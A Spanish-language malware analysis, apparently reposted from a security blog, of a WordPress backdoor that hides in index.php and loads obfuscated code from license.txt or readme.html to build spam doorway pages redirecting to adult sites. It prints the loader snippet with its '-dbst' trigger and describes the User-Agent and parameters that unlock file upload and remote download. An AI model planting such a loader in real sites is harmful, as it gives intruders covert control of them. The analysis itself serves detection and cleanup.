Wigo Significa Bingo para Agente de Blackseo

Share this…

Esta semana, mi colega Peter Gramantik me ha mostrado algunos sitios web infectados que tenían un código muy similar en sus archivos index.php de WordPress:

if (eregi('-dbst',$_SERVER['REQUEST_URI'])) {

error_reporting(0);

include ('license.txt');

exit();

}

El código es muy simples. Él comprueba si la URL de la página tiene “-dbst” y ejecuta el código de um archivo incluido. A primera vista, parecía que era un código de puerta trasera que devería se activar si los hackers usasen URLs especiales con el passcode “-dbst”.

En algunos casos, el archivo incluido era el license.txt, en otros, era readme.html. Ambos los archivos eran parte del core de WordPress y deberían estar en el directorio root. Sin embargo, como se esperaba, ellos contenían algunos códigos extras ofuscados.

Condiciones Wigo

Después de la desofuscación, encontramos un código de puerta trasera aquí:

server

Además de tener un “-dbst” en la URL, también requería un Agente Usuario “Blackseo Agent v 0.1” y parámetros GET php4 o php5. En el caso del php4, crea un formulario de upload de archivo, en el caso de php5, descarga un archivo remoto para un servidor vulnerable. En todos los casos, la puerta trasera incluye una etiqueta del “Wigo”, lo que ayuda a verificar que la puerta trasera está allá.

Sin embargo, como el Agente Usuario “Blackseo Agent v 0.1” sugere, no se trata solamente de una puerta trasera. El código también tiene una parte mayor que ha creado doorways spammy, usando esas informaciones del hxxp://apollo5go . com/api.php?action=get_link&api_key=…adultwww .apollo2gen .com. Las doorways tienen un script que redirije a los visitantes para hxxp://www .hqnuvideoz .com/out.php?id=traffic-shop.com, y después para hxxp://www .us-xxx .com/tr.php?id=hqnuvideoz.com, y finalmente para varios sitios web pornos.

Encontrando el Patrón

Dada esa información, empezamos a buscar en Google por las páginas que contenían “-dbst” en sus URLs. dbst parecía ser una abreviación muy común, entonces añadimos algunas palabras-clave adultas y la query [inurl:”dbst” xxx] tuvo algunos resultados promisorios, con URLs como: best-playboy-photo-ever-dbst.html. Por supuesto ellas eran spammy doorways y los sitios web habían sido pirateados. Ahora sólo necesitábamos descobrir si era el mismo ataque que habíamos investigado. Para eso, intentamos abrir esas páginas web, usando el Agente de Usuario  “Blackseo Agent v 0.1”. Como se esperaba, la mayoría de las URLs tuvieran este resultado:

Wigo%

Bingo!

Siga [site:hacked-site.com inurl:”dbst”] pesquisas han revelado que ese ataque creó de 1.000 a 40.000 páginas web con spammy doorway en sitios web pirateados.

Fuente:https://blog.sucuri.net